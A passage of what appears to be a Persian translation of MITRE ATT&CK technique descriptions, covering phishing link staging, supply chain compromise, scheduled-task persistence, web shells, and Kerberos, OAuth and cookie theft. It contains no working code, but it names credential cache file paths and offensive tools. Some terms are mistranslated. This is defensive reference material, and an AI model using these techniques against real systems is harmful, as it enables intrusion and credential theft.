ممکن است دامنه‌هایی مشابه دامنه‌های قانونی (مثلاً هموگلیف‌ها، تایپوسکوت، دامنه‌های سطح بالای مختلف، و غیره) را در حین دستیابی به زیرساخت (دامنه‌ها) خریداری کنند تا به سازش Drive-by کمک کنند.

قابلیت های مرحله: پیوند هدف

Stage Capabilities: Link Target

دشمنان ممکن است منابعی را قرار دهند که توسط پیوندی ارجاع داده می شود که می تواند در هنگام هدف گیری مورد استفاده قرار گیرد. حریف ممکن است به کلیک کاربر روی یک پیوند مخرب برای افشای اطلاعات (از جمله اعتبار) یا به دست آوردن اعدام، مانند لینک مخرب، تکیه کند. پیوندها را می توان برای spearphishing استفاده کرد، مانند ارسال یک ایمیل همراه با متن مهندسی اجتماعی برای ترغیب کاربر به کلیک فعال یا کپی و چسباندن URL در مرورگر. قبل از یک فیش برای اطلاعات (مانند پیوند (Spearphishing) یا یک فیش برای دسترسی اولیه به یک سیستم مانند (Spearphishing Link) ، یک دشمن باید منابع یک هدف پیوند را برای پیوند spearphishing تنظیم کند. به طور معمول، منابع برای هدف پیوند یک صفحه HTML است که ممکن است شامل برخی از اسکریپت‌های سمت کلاینت مانند جاوا اسکریپت باشد تا تصمیم بگیرد چه محتوایی را به کاربر ارائه دهد. دشمنان ممکن است سایت‌های قانونی را شبیه‌سازی کنند تا به عنوان هدف پیوند عمل کنند، این می‌تواند شامل شبیه‌سازی صفحات ورود به سرویس‌های وب قانونی یا صفحات ورود به سیستم در تلاش برای جمع‌آوری اعتبار در طول پیوند Spearphishing باشد. همچنین ممکن است دشمنان بدافزار را آپلود کنند و لینک هدف را برای دانلود/اجرا توسط کاربر به بدافزار داشته باشند. دشمنان ممکن است دامنه‌های مشابه دامنه‌های قانونی (مانند هموگلیف‌ها، تایپوسکوت، دامنه‌های مختلف سطح بالا و غیره) را در حین دستیابی به زیرساخت (دامنه‌ها) خریداری کنند تا به تسهیل پیوند مخرب کمک کنند. خدمات کوتاه کردن لینک نیز می‌تواند مورد استفاده قرار گیرد.

سازش زنجیره تامین

Supply Chain Compromise

دشمنان ممکن است محصولات یا مکانیسم های تحویل محصول را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده ها یا سیستم دستکاری کنند. به خطر افتادن زنجیره تامین می تواند در هر مرحله از زنجیره تامین از جمله: دستکاری ابزارهای توسعه، دستکاری محیط توسعه، دستکاری مخازن کد منبع (عمومی یا خصوصی)، دستکاری کد منبع در وابستگی های منبع باز، دستکاری مکانیسم های به روز رسانی/توزیع نرم افزار، تصاویر سیستم آسیب دیده/آلوده، جایگزینی نرم افزار قانونی با نسخه های اصلاح شده، فروش محصولات اصلاح شده/تقلبی به توزیع کنندگان قانونی، ممنوعیت حمل و نقل. در حالی که به خطر افتادن زنجیره تامین می‌تواند بر هر جزء از سخت‌افزار یا نرم‌افزار تأثیر بگذارد، مهاجمانی که به دنبال اجرا هستند، اغلب بر افزودن‌های مخرب به نرم‌افزار قانونی در کانال‌های توزیع نرم‌افزار یا به‌روزرسانی متمرکز شده‌اند. هدف‌یابی ممکن است مختص یک مجموعه قربانی مورد نظر باشد یا نرم‌افزار مخرب ممکن است بین مجموعه وسیعی از مصرف‌کنندگان توزیع شود، اما فقط به سمت تاکتیک‌های اضافی بر روی قربانیان خاص حرکت کند. پروژه های منبع باز محبوب که به عنوان وابستگی در بسیاری از برنامه ها استفاده می شوند نیز ممکن است به عنوان ابزاری برای افزودن کد مخرب به کاربران وابستگی مورد هدف قرار گیرند.

مصالحه با زنجیره تامین: به خطر انداختن وابستگی‌های نرم افزاری و ابزارهای توسعه

Supply Chain Compromise: Compromise Software Dependencies and Development Tools

دشمنان ممکن است وابستگی‌های نرم افزاری و ابزارهای توسعه را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده ها یا سیستم دستکاری کنند. برنامه ها اغلب به نرم افزار خارجی برای عملکرد صحیح وابسته هستند. پروژه های منبع باز محبوبی که به عنوان وابستگی در بسیاری از برنامه ها استفاده می شوند ممکن است به عنوان ابزاری برای افزودن کد مخرب به کاربران وابستگی مورد هدف قرار گیرند. هدف گذاری ممکن است مختص یک مجموعه قربانی مورد نظر باشد یا ممکن است بین مجموعه گسترده ای از مصرف کنندگان توزیع شود، اما فقط به سمت تاکتیک های اضافی در مورد قربانیان خاص حرکت می کند.

مصالحه با زنجیره تامین: زنجیره تامین نرم افزار به خطر افتاده

Supply Chain Compromise: Compromise Software Supply Chain

دشمنان ممکن است نرم افزار کاربردی را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده ها یا سیستم دستکاری کنند. به خطر انداختن زنجیره تامین نرم‌افزار می‌تواند به روش‌های مختلفی از جمله دستکاری کد منبع برنامه، دستکاری مکانیسم به‌روزرسانی/توزیع برای آن نرم‌افزار، یا جایگزینی نسخه‌های کامپایل‌شده با نسخه اصلاح‌شده رخ دهد. هدف گیری ممکن است مختص یک مجموعه قربانی مورد نظر باشد یا ممکن است بین مجموعه وسیعی از مصرف کنندگان توزیع شود، اما فقط به سمت تاکتیک های اضافی در مورد قربانیان خاص حرکت می کند.

مصالحه با زنجیره تامین: زنجیره تامین سخت افزار به خطر افتاد

Supply Chain Compromise: Compromise Hardware Supply Chain

دشمنان ممکن است اجزای سخت افزاری محصولات را قبل از دریافت توسط مصرف کننده نهایی به منظور به خطر انداختن داده‌ها یا سیستم دستکاری کنند. با اصلاح سخت‌افزار در زنجیره تامین، دشمنان می‌توانند backdoors را وارد شبکه‌های مصرف‌کننده که شناسایی آن ممکن است دشوار باشد و درجه بالایی از کنترل بر سیستم را به دشمن بدهد. backdoorsسخت‌افزاری ممکن است در دستگاه‌های مختلفی مانند سرورها، ایستگاه‌های کاری، زیرساخت‌های شبکه یا لوازم جانبی وارد شوند.

وظیفه / شغل برنامه ریزی شده

Scheduled Task/Job

ممکن است دشمنان از عملکرد زمان‌بندی کار برای تسهیل اجرای اولیه یا تکراری کد مخرب سوء استفاده کنند. ابزارهای کمکی در تمام سیستم عامل های اصلی وجود دارند تا برنامه ها یا اسکریپت ها را در تاریخ و زمان مشخصی اجرا کنند. یک کار همچنین می تواند در یک سیستم راه دور برنامه ریزی شود، مشروط بر اینکه احراز هویت مناسب انجام شود (مثلاً: RPC و اشتراک گذاری فایل و چاپگر در محیط های ویندوز). زمان‌بندی یک کار در یک سیستم راه دور معمولاً مستلزم عضویت در یک سرپرست یا گروه ممتاز در سیستم راه دور است.دشمنان ممکن است از زمان‌بندی وظایف برای اجرای برنامه‌ها در هنگام راه‌اندازی سیستم یا بر اساس برنامه‌ریزی‌شده برای تداوم استفاده کنند. همچنین می‌توان از این مکانیسم‌ها برای اجرای یک فرآیند در چارچوب یک حساب مشخص (مانند حسابی با مجوزها/امتیازات بالا) سوء استفاده کرد.

وظیفه / شغل برنامه ریزی شده: در (لینوکس)

Scheduled Task/Job: At (Linux)

دشمنان ممکن است از ابزار برای انجام وظایف اجرای اولیه، مکرر یا آتی کد مخرب سوء استفاده کنند. فرمان at در سیستم عامل های لینوکس، مدیران را قادر می سازد تا وظایف را زمان بندی کنند. یک دشمن ممکن است در محیط های لینوکس برای اجرای برنامه ها در هنگام راه اندازی سیستم یا بر اساس نقشه برنامه ریزی شده برای تداوم استفاده کند.

وظیفه / شغل برنامه ریزی شده: در (ویندوز)

Scheduled Task/Job: At (Windows)

دشمنان ممکن است از ابزار at.exe برای انجام برنامه ریزی وظایف برای اجرای اولیه یا تکراری کد مخرب سوءاستفاده کنند. ابزار at به عنوان یک فایل اجرایی در ویندوز برای زمان‌بندی وظایف در زمان و تاریخ مشخص وجود دارد. استفاده از at مستلزم آن است که سرویس Task Scheduler در حال اجرا باشد و کاربر به عنوان عضوی از گروه Administrators محلی وارد سیستم شود. حریف ممکن است از at.exe در محیط‌های ویندوز برای اجرای برنامه‌ها در هنگام راه‌اندازی سیستم یا بر اساس برنامه‌ریزی‌شده برای تداوم استفاده کند. در همچنین می‌تواند برای انجام اجرای از راه دور به عنوان بخشی از حرکت جانبی و یا اجرای فرآیندی در چارچوب یک حساب مشخص مانند (SYSTEM) مورد سوء استفاده قرار گیرد. توجه: ابزار خط فرمان at.exe در نسخه های فعلی ویندوز به نفع schtasks منسوخ شده است.

وظیفه / شغل برنامه ریزی شده: Cron

Scheduled Task/Job: Cron

دشمنان ممکن است از برنامه Cronبرای اجرای برنامه ریزی وظایف برای اجرای اولیه یا تکراری کد مخرب سوء استفاده کنند. ابزار Cron یک زمانبندی کار مبتنی بر زمان برای سیستم عامل های مشابه یونیکس است. فایل crontab شامل برنامه زمانبندی ورودی های Cronبرای اجرا و زمان های مشخص شده برای اجرا می باشد. هر فایل crontab در مسیرهای فایل خاص سیستم عامل ذخیره می شود. دشمن ممکن است از Cronدر محیط‌های لینوکس یا یونیکس برای اجرای برنامه‌ها در هنگام راه‌اندازی سیستم یا بر اساس برنامه‌ریزی‌شده برای پایداری استفاده کند.

کار برنامه ریزی شده / شغل: کار برنامه ریزی شده

Scheduled Task/Job: Scheduled Task

دشمنان ممکن است از Windows Task Scheduler برای انجام برنامه ریزی وظایف برای اجرای اولیه یا تکراری کدهای مخرب سوء استفاده کنند. راه های مختلفی برای دسترسی به Task Scheduler در ویندوز وجود دارد. schtasks را می توان مستقیماً در خط فرمان اجرا کرد یا Task Scheduler را می توان از طریق رابط کاربری گرافیکی در بخش Administrator Tools در کنترل پنل باز کرد.

وظیفه / شغل برنامه ریزی شده: تایمرهای سیستمی

Scheduled Task/Job: Systemd Timers

دشمنان ممکن است از تایمرهای سیستمی برای انجام برنامه ریزی وظایف و برای اجرای اولیه یا تکراری کدهای مخرب سوء استفاده کنند. تایمرهای Systemd فایل های واحدی با پسوند فایلtimer. هستند که خدمات را کنترل می کنند. تایمرها را می توان طوری تنظیم کرد که روی یک رویداد تقویمی یا پس از یک بازه زمانی نسبت به نقطه شروع اجرا شوند. آنها می توانند به عنوان جایگزینی برای Cron در محیط های لینوکس استفاده شوند. تایمرهای سیستمی ممکن است از راه دور از طریق ابزار خط فرمان systemctl که روی SSH کار می کند، فعال شوند.

وظیفه / شغل برنامه ریزی شده: کار ارکستراسیون کانتینر

Scheduled Task/Job: Container Orchestration Job

دشمنان ممکن است از عملکرد زمان‌بندی کار ارائه شده توسط ابزارهای هماهنگ‌سازی کانتینر مانند Kubernetes برای برنامه‌ریزی استقرار کانتینرهایی که برای اجرای کدهای مخرب پیکربندی شده‌اند سوء استفاده کنند. کارهای ارکستراسیون کانتینر این وظایف خودکار را در تاریخ و زمان خاصی اجرا می کنند، مشابه کارهای cron در یک سیستم لینوکس. استقرارهای این نوع همچنین می توانند برای نگهداری مقداری از کانتینرها در طول زمان پیکربندی شوند و فرآیند حفظ پایداری در یک خوشه را خودکار کنند. در Kubernetes، CronJob ممکن است برای برنامه‌ریزی کاری استفاده شود که یک یا چند کانتینر را برای انجام وظایف خاص اجرا می‌کند. بنابراین، یک دشمن ممکن است از CronJob برای برنامه‌ریزی استقرار یک Job استفاده کند که کدهای مخرب را در گره‌های مختلف در یک خوشه اجرا می‌کند.

ماژول های مشترک

Shared Modules

دشمنان ممکن است بارهای مخرب را از طریق بارگذاری ماژول های مشترک اجرا کنند. به بارگذار ماژول ویندوز می‌توان دستور بارگذاری DLLها را از مسیرهای محلی دلخواه و مسیرهای شبکه کنوانسیون نام‌گذاری جهانی (UNC ) داد. این قابلیت در NTDLL.dll قرار دارد و بخشی از Windows Native API است که از توابعی مانند CreateProcess، LoadLibrary و غیره فراخوانی می شود.

ابزارهای استقرار نرم افزار

Software Deployment Tools

دشمنان ممکن است به مجموعه‌های نرم‌افزاری شخص ثالث نصب شده در یک شبکه سازمانی مانند سیستم‌های مدیریت، نظارت و استقرار برای حرکت جانبی در شبکه دسترسی پیدا کنند و از آنها استفاده کنند. برنامه‌های شخص ثالث و سیستم‌های استقرار نرم‌افزار ممکن است در محیط شبکه برای اهداف مدیریتی استفاده شوند (مانند SCCM، HBSS، Altiris و غیره). دسترسی به یک سیستم نرم افزاری در سطح شبکه یا سازمانی شخص ثالث ممکن است به دشمن امکان اجرای کد از راه دور را در تمام سیستم هایی که به چنین سیستمی متصل هستند را بدهد. این دسترسی ممکن است برای انتقال جانبی به سیستم‌های دیگر، جمع‌آوری اطلاعات یا ایجاد یک اثر خاص، مانند پاک کردن هارد دیسک‌ها در تمام نقاط پایانی استفاده شود. مجوزهای مورد نیاز برای این عمل بسته به پیکربندی سیستم متفاوت است. اعتبار محلی ممکن است با دسترسی مستقیم به سیستم شخص ثالث کافی باشد، یا ممکن است اعتبار دامنه خاصی مورد نیاز باشد. با این حال، سیستم ممکن است نیاز به یک حساب اداری برای ورود به سیستم یا انجام هدف مورد نظر خود داشته باشد.

خدمات سیستمی

System Services

دشمنان ممکن است از سرویس‌های سیستم یا شیاطین برای اجرای دستورات یا برنامه‌ها سوءاستفاده کنند. دشمنان می توانند محتوای مخرب را با تعامل یا ایجاد سرویس ها به صورت محلی یا از راه دور اجرا کنند. بسیاری از سرویس‌ها قرار است در هنگام راه‌اندازی اجرا شوند، که می‌تواند به پایداری (ایجاد یا اصلاح فرآیند سیستم) کمک کند، اما دشمنان همچنین می‌توانند از خدمات برای اجرای یک‌باره یا موقت سوء استفاده کنند.

خدمات سیستم: Launchctl

System Services: Launchctl

ممکن است دشمنان از launchctl برای اجرای دستورات یا برنامه‌ها سوء استفاده کنند. Launchctl با راه اندازی، چارچوب مدیریت خدمات برای macOS رابط کاربری دارد. Launchctl از گرفتن دستورات فرعی در خط فرمان، به صورت تعاملی، یا حتی تغییر مسیر از ورودی استاندارد پشتیبانی می کند.دشمنان از launchctl برای اجرای دستورات و برنامه ها به عنوان Launch Agents یا Launch Daemons استفاده می کنند. دستورات فرعی رایج عبارتند از: launchctl load، launchctl unload و .launchctl start دشمنان می‌توانند از اسکریپت‌ها استفاده کنند.

خدمات سیستم: اجرای خدمات

System Services: Service Execution

دشمنان ممکن است از مدیر کنترل سرویس ویندوز برای اجرای دستورات یا بارهای مخرب سوء استفاده کنند. مدیر کنترل سرویس ویندوز (services.exe) یک رابط برای مدیریت و دستکاری خدمات است. مدیر کنترل سرویس از طریق اجزای رابط کاربری گرافیکی و همچنین ابزارهای سیستمی مانند sc.exe و Net در دسترس کاربران است. PsExec همچنین می‌تواند برای اجرای دستورات یا بارهای پرداختی از طریق یک سرویس موقت ویندوز ایجاد شده از طریق API مدیریت کنترل سرویس استفاده شود. ابزارهایی مانند PsExec و sc.exe می‌توانند سرورهای راه دور را به عنوان آرگومان بپذیرند و ممکن است برای اجرای اجرای از راه دور استفاده شوند.دشمنان ممکن است از این مکانیسم ها برای اجرای محتوای مخرب استفاده کنند. این را می توان با اجرای یک سرویس جدید یا اصلاح شده انجام داد. این تکنیک، اجرای همراه با سرویس ویندوز در هنگام تداوم سرویس یا افزایش امتیازات است.

جزء نرم افزار سرور

Server Software Component

دشمنان ممکن است از ویژگی‌های توسعه قابل توسعه قانونی سرورها برای ایجاد دسترسی دائمی به سیستم‌ها سوء استفاده کنند. برنامه های کاربردی سرور سازمانی ممکن است شامل ویژگی هایی باشد که به توسعه دهندگان اجازه می دهد تا نرم افزار یا اسکریپت هایی را برای گسترش عملکرد برنامه اصلی بنویسند و نصب کنند. دشمنان ممکن است اجزای مخرب را برای گسترش و سوء استفاده از برنامه های سرور نصب کنند.

جزء نرم افزار سرور: رویه‌های ذخیره شده SQL

Server Software Component: SQL Stored Procedures

ممکن است دشمنان از رویه های ذخیره شده SQL برای ایجاد دسترسی دائمی به سیستم ها سوء استفاده کنند. رویه‌های ذخیره‌شده SQL کدهایی هستند که می‌توان آن‌ها را ذخیره و مجدداً استفاده کرد تا کاربران پایگاه‌داده زمان را برای بازنویسی پرس‌و‌جوهای پرکاربردSQL تلف نکنند. رویه‌های ذخیره‌شده را می‌توان از طریق دستورات SQLبه پایگاه داده با استفاده از نام رویه یا از طریق رویدادهای تعریف‌شده فراخوانی کرد (مثلاً زمانی که یک برنامه سرور SQLراه‌اندازی/راه‌اندازی مجدد می‌شود). دشمنان ممکن است رویه‌های ذخیره‌شده مخربی ایجاد کنند که می‌توانند مکانیسم پایداری را در سرورهای پایگاه داده SQLارائه دهند. برای اجرای دستورات سیستم عامل از طریق نحو SQL، دشمن ممکن است مجبور باشد عملکردهای اضافی را فعال کند.

جزء نرم افزار سرور: عامل حمل و نقل

Server Software Component: Transport Agent

دشمنان ممکن است از عوامل حمل و نقل مایکروسافت برای ایجاد دسترسی دائمی به سیستم ها سوء استفاده کنند. عوامل انتقال مایکروسافت اکسچنج می‌توانند روی پیام‌های ایمیلی که از خط لوله انتقال عبور می‌کنند کار کنند تا کارهای مختلفی مانند فیلتر کردن هرزنامه، فیلتر کردن پیوست‌های مخرب، ژورنال کردن یا اضافه کردن یک امضای شرکتی به انتهای همه ایمیل‌های خروجی انجام دهند. عوامل حمل و نقل را می توان توسط توسعه دهندگان برنامه نوشت و سپس در مجموعه های NET. که متعاقباً در سرور Exchange ثبت می شوند، کامپایل کرد. عوامل حمل و نقل در طول یک مرحله مشخص از پردازش ایمیل فراخوانی می شوند و وظایف تعریف شده توسط توسعه دهنده را انجام می دهند. دشمنان ممکن است یک عامل حمل و نقل مخرب را ثبت کنند تا مکانیزم پایداری را در Exchange Server ارائه دهند که می تواند توسط رویدادهای ایمیل مشخص شده توسط دشمن ایجاد شود. اگرچه ممکن است یک عامل حمل و نقل مخرب برای همه ایمیل‌هایی که از خط لوله انتقال Exchange عبور می‌کنند فراخوانی شود، این عامل می‌تواند به گونه‌ای پیکربندی شود که فقط وظایف خاصی را در پاسخ به معیارهای تعریف شده دشمن انجام دهد. به عنوان مثال، عامل حمل و نقل تنها ممکن است اقدامی مانند کپی کردن پیوست های حین حمل و نقل و ذخیره آنها برای استخراج بعدی را انجام دهد در صورتی که آدرس ایمیل گیرنده با ورودی لیست ارائه شده توسط دشمن مطابقت داشته باشد.

جزء نرم افزار سرور: Web Shell

Server Software Component: Web Shell

دشمنان ممکن است سرورهای وب را با پوسته‌های وب برای ایجاد دسترسی دائمی به سیستم‌ها در پشت خود قرار دهند. پوسته وب یک اسکریپت وب است که بر روی یک وب سرور قابل دسترسی آزاد قرار می گیرد تا به دشمن اجازه دهد از وب سرور به عنوان دروازه ورود به شبکه استفاده کند. یک پوسته وب ممکن است مجموعه‌ای از توابع را برای اجرا یا یک رابط خط فرمان در سیستمی که سرور وب را میزبانی می کند ارائه دهد. علاوه بر یک اسکریپت سمت سرور، یک پوسته وب ممکن است یک برنامه رابط مشتری داشته باشد که برای صحبت با سرور وب استفاده می شود (مثلاً: China Chopper Web shell Client )

مؤلفه نرم افزار سرور: مؤلفه های IIS

Server Software Component: IIS Components

دشمنان ممکن است اجزای مخربی را نصب کنند که بر روی سرورهای وب سرویس‌های اطلاعات اینترنتی (IIS) اجرا می‌شوند تا پایداری ایجاد کنند. IISمکانیسم های مختلفی را برای گسترش عملکرد وب سرورها ارائه می دهد. به عنوان مثال، پسوندها و فیلترهای رابط برنامه نویسی برنامه سرور اینترنت (ISAPI) را می‌توان برای بررسی و یا اصلاح درخواست های وب ورودی و خروجی IISنصب کرد. دشمنان ممکن است افزونه‌ها و فیلترهای مخرب ISAPI را برای مشاهده و/یا اصلاح ترافیک، اجرای دستورات در ماشین‌های در معرض خطر، یا فرمان پروکسی و کنترل ترافیک نصب کنند. پسوندها و فیلترهای ISAPI ممکن است به تمام درخواست‌ها و پاسخ‌های وب IIS دسترسی داشته باشند. برای مثال، یک دشمن ممکن است از این مکانیسم‌ها برای اصلاح پاسخ‌های HTTP به منظور توزیع دستورات/محتوای مخرب در میزبان‌های قبلاً تشکیل‌شده سوء استفاده کند.

سرقت رمز دسترسی برنامه

Steal Application Access Token

دشمنان می توانند توکن های دسترسی برنامه های کاربر را به عنوان ابزاری برای به دست آوردن اعتبار برای دسترسی به سیستم ها و منابع راه دور بدزدند. این می تواند از طریق مهندسی اجتماعی رخ دهد و معمولاً نیاز به اقدام کاربر برای اعطای دسترسی دارد. نشانه‌های دسترسی برنامه برای ایجاد درخواست‌های مجاز API از طرف یک کاربر استفاده می‌شوند و معمولاً به عنوان راهی برای دسترسی به منابع در برنامه‌های کاربردی مبتنی بر ابر و نرم‌افزار به‌عنوان سرویس ( SaaS) استفاده می‌شوند. OAuth یکی از چارچوب‌هایی است که معمولاً پیاده‌سازی می‌شود که توکن‌هایی را برای کاربران برای دسترسی به سیستم‌ها صادر می‌کند. برنامه‌ای که مایل به دسترسی به سرویس‌های مبتنی بر ابر یا APIهای محافظت‌شده است، می‌تواند با استفاده از OAuth 2.0 از طریق انواع پروتکل‌های مجوز وارد شود. نمونه‌ای از دنباله‌ای که معمولاً مورد استفاده قرار می‌گیرد، جریان اعطای کد مجوز مایکروسافت است. یک نشانه دسترسی OAuth به یک برنامه شخص ثالث امکان می دهد تا با منابع حاوی داده‌های کاربر به روش های درخواست شده توسط برنامه بدون دریافت اعتبار کاربر تعامل داشته باشد.دشمنان می توانند با ساختن یک برنامه مخرب طراحی شده برای دسترسی به منابع با توکن OAuth کاربر هدف، از مجوز OAuth استفاده کنند. حریف باید ثبت نام برنامه خود را با سرور مجوز تکمیل کند، برای مثال Microsoft Identity Platform با استفاده از Azure Portal، Visual Studio IDE، رابط خط فرمان، PowerShell یا تماس‌های REST API سپس، آنها می توانند پیوندی را از طریق Spearphishing Link برای کاربر مورد نظر ارسال کنند تا آنها را ترغیب کنند تا به برنامه دسترسی داشته باشند. هنگامی که نشانه دسترسی OAuth اعطا شد، برنامه می‌تواند از طریق Application Access Token به ویژگی‌های حساب کاربری دسترسی طولانی‌مدت داشته باشد. دشمنانی دیده شده اند که کاربران جی میل، مایکروسافت اوت لوک و یاهو میل را هدف قرار داده اند.

دزدیدن یا جعل کردن بلیت‌های Kerberos

Steal or Forge Kerberos Tickets

دشمنان ممکن است با دزدیدن یا جعل بلیط های Kerberos برای فعال کردن Pass the Ticket تلاش کنند تا احراز هویت Kerberos را مخدوش کنند. Kerberos یک پروتکل احراز هویت است که به طور گسترده در محیط‌های دامنه مدرن ویندوز استفاده می شود. در محیط‌های Kerberos، که به آنها "قلمروها" گفته می‌شود، سه شرکت کننده اصلی وجود دارد: مشتری، سرویس، و مرکز توزیع کلید (KDC) مشتریان درخواست دسترسی به یک سرویس را دارند و از طریق مبادله بلیط های Kerberos که از KDC منشا می گیرند، پس از احراز هویت موفقیت آمیز به آنها اجازه دسترسی داده می شود. KDC مسئول احراز هویت و اعطای بلیط است. مهاجمان ممکن است با سرقت بلیط یا جعل بلیط برای فعال کردن دسترسی غیرمجاز، سعی کنند از Kerberos سوء استفاده کنند. در ویندوز، ابزار داخلی klist می‌تواند برای فهرست کردن و تحلیل بلیط‌های Kerberos در حافظه پنهان استفاده شود. سیستم‌های لینوکس در دامنه‌های اکتیو دایرکتوری، اعتبار Kerberos را به صورت محلی در فایل حافظه پنهان اعتبار که به آن " "cache گفته می‌شود، ذخیره می‌کنند. اعتبارنامه ها تا زمانی که معتبر می مانند و به طور کلی تا زمانی که جلسه کاربر طول می کشد، در فایل ccache ذخیره می شوند. در سیستم‌های لینوکس مدرن Redhat Enterprise و توزیع‌های مشتق شده، سیستم امنیت خدمات دیمون (SSSD) بلیط‌های Kerberos را مدیریت می‌کند. به طور پیش فرض SSSD یک کپی از پایگاه داده بلیط را که می‌تواند در /var/lib/sss/secrets/secrets.ldb و همچنین کلید مربوطه در //var/lib/sss/secrets/.secrets.mkey یافت می شود، نگهداری می کند. هر دو فایل برای خواندن نیاز به دسترسی روت دارند. اگر دشمن بتواند به پایگاه داده و کلید دسترسی داشته باشد، حافظه پنهان اعتبار Kerberos blob را می توان استخراج کرد و به یک فایل ccache Kerberos قابل استفاده تبدیل کرد که دشمنان ممکن است برای Pass the Ticket از آن استفاده کنند. فایل ccache همچنین ممکن است با استفاده از ابزارهایی مانند Kekeo به فرمت ویندوز تبدیل شود. بلیط‌های Kerberos در macOS در قالب استاندارد ccache، مشابه لینوکس، ذخیره می‌شوند. به طور پیش‌فرض، دسترسی به این ورودی‌های حافظه پنهان از طریق فرآیند شبح KCM از طریق پروتکل Mach RPC، که از محیط تماس‌گیرنده برای تعیین دسترسی استفاده می‌کند، فدرال می‌شود. محل ذخیره سازی این ورودی های حافظه پنهان تحت تأثیر فایل پیکربندی /etc/krb5.conf و متغیر محیطی KRB5CCNAME است که می تواند تعیین کند تا آنها را در دیسک ذخیره کند یا از طریق دیمون KCM محافظت شود. کاربران می‌توانند با استفاده از باینری های داخلی kinit, klist, ktutil, and kcc از طریق فریم ورک Kerberos بومی اپل، با ذخیره سازی بلیط تعامل داشته باشند. دشمنان می توانند از ابزارهای منبع باز برای تعامل مستقیم با فایل‌های حافظه پنهان یا استفاده از چارچوب Kerberos برای فراخوانی API های سطح پایین تر برای استخراج TGT یا بلیط های سرویس کاربر استفاده کنند.

سرقت کوکی جلسه وب

Steal Web Session Cookie

یک دشمن ممکن است کوکی‌های جلسه برنامه یا خدمات وب را بدزدد و از آنها برای دسترسی به برنامه‌های کاربردی وب یا سرویس‌های اینترنتی به عنوان یک کاربر تأیید شده بدون نیاز به اعتبار استفاده کند. برنامه‌ها و سرویس‌های وب اغلب از کوکی‌های جلسه به‌عنوان نشانه احراز هویت پس از احراز هویت کاربر در یک وب‌سایت استفاده می‌کنند.کوکی ها اغلب برای مدت طولانی معتبر هستند، حتی اگر برنامه وب به طور فعال استفاده نشود. کوکی‌ها را می‌توان روی دیسک، حافظه پردازش مرورگر و در ترافیک شبکه به سیستم‌های راه دور پیدا کرد. علاوه بر این، سایر برنامه‌های کاربردی در دستگاه هدف ممکن است کوکی‌های احراز هویت حساس را در حافظه ذخیره کنند (مانند برنامه‌هایی که در سرویس‌های ابری احراز هویت می‌شوند). از کوکی‌های جلسه می‌توان برای دور زدن برخی از پروتکل‌های احراز هویت چند عاملی استفاده کرد. چندین نمونه از بدافزارهایی که کوکی‌ها را از مرورگرهای وب در سیستم محلی هدف قرار می‌دهند وجود دارد. همچنین چارچوب‌های منبع باز مانند Evilginx 2 and Muraenaوجود دارند که می‌توانند کوکی‌های جلسه را از طریق یک پروکسی مخرب جمع‌آوری کنند (مثلاً: (Adversary-in-the-Middle) که می‌تواند توسط یک دشمن تنظیم شود و در کمپین‌های فیشینگ استفاده شود. پس از اینکه دشمن یک کوکی معتبر به دست آورد، می‌تواند یک تکنیک Web Session Cookie را برای ورود به برنامه وب مربوطه اجرا کند.

کشف نرم افزار

Software Discovery

ممکن است دشمنان سعی کنند فهرستی از نرم افزارها و نسخه های نرم افزاری را که بر روی یک سیستم یا در محیط ابری نصب شده اند، دریافت کنند. دشمنان ممکن است از اطلاعات Software Discovery در طول کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. دشمنان ممکن است به دلایل مختلفی سعی کنند نرم افزار را برشمارند، از جمله اینکه بدانند چه اقدامات امنیتی وجود دارد یا اینکه آیا سیستم در معرض خطر دارای نسخه ای از نرم افزار است که در برابر سوء استفاده برای افزایش امتیاز آسیب پذیر است.

کشف اطلاعات سیستم

System Information Discovery

دشمن ممکن است تلاش کند اطلاعات دقیقی در مورد سیستم عامل و سخت افزار، از جمله نسخه، وصله ها، رفع فوری، بسته های خدمات و معماری به دست آورد. دشمنان ممکن است از اطلاعات کشف اطلاعات سیستم در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. برای جمع آوری اطلاعات دقیق سیستم می توان از ابزارهایی مانند Systeminfo استفاده کرد. اگر با دسترسی ممتاز اجرا می شود، می توان تجزیه و تحلیل داده های سیستم را از طریق ابزار پیکربندی systemetup در macOS جمع آوری کرد. به عنوان مثال، دشمنان با دسترسی در سطح کاربر می توانند دستور df -aH را برای به دست آوردن دیسک های نصب شده فعلی و فضای آزادانه مرتبط با آن اجرا کنند. کشف اطلاعات سیستم همراه با اطلاعات جمع‌آوری‌شده از اشکال دیگر کشف و شناسایی می‌تواند باعث توسعه و پنهان‌سازی محموله شود.

کشف موقعیت مکانی سیستم

System Location Discovery

دشمنان ممکن است اطلاعاتی را در تلاش برای محاسبه موقعیت جغرافیایی میزبان قربانی جمع آوری کنند. دشمنان ممکن است از اطلاعات «کشف موقعیت مکانی سیستم» در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و یا اقدامات خاصی را انجام می دهد. دشمنان ممکن است با استفاده از بررسی‌های سیستمی مختلف، مانند منطقه زمانی، طرح‌بندی صفحه‌کلید و/یا تنظیمات زبان، مکان یک سیستم را استنتاج کنند. توابع Windows API مانند GetLocaleInfoW نیز می توانند برای تعیین منطقه میزبان استفاده شوند. در محیط های ابری، منطقه در دسترس بودن یک نمونه نیز ممکن است با دسترسی به سرویس ابرداده نمونه از نمونه کشف شود. همچنین ممکن است دشمنان با استفاده از آدرس‌دهی IP، مانند سرویس‌های جستجوی IP موقعیت جغرافیایی آنلاین، مکان میزبان قربانی را استنباط کنند.

کشف پیکربندی شبکه سیستم

System Network Configuration Discovery

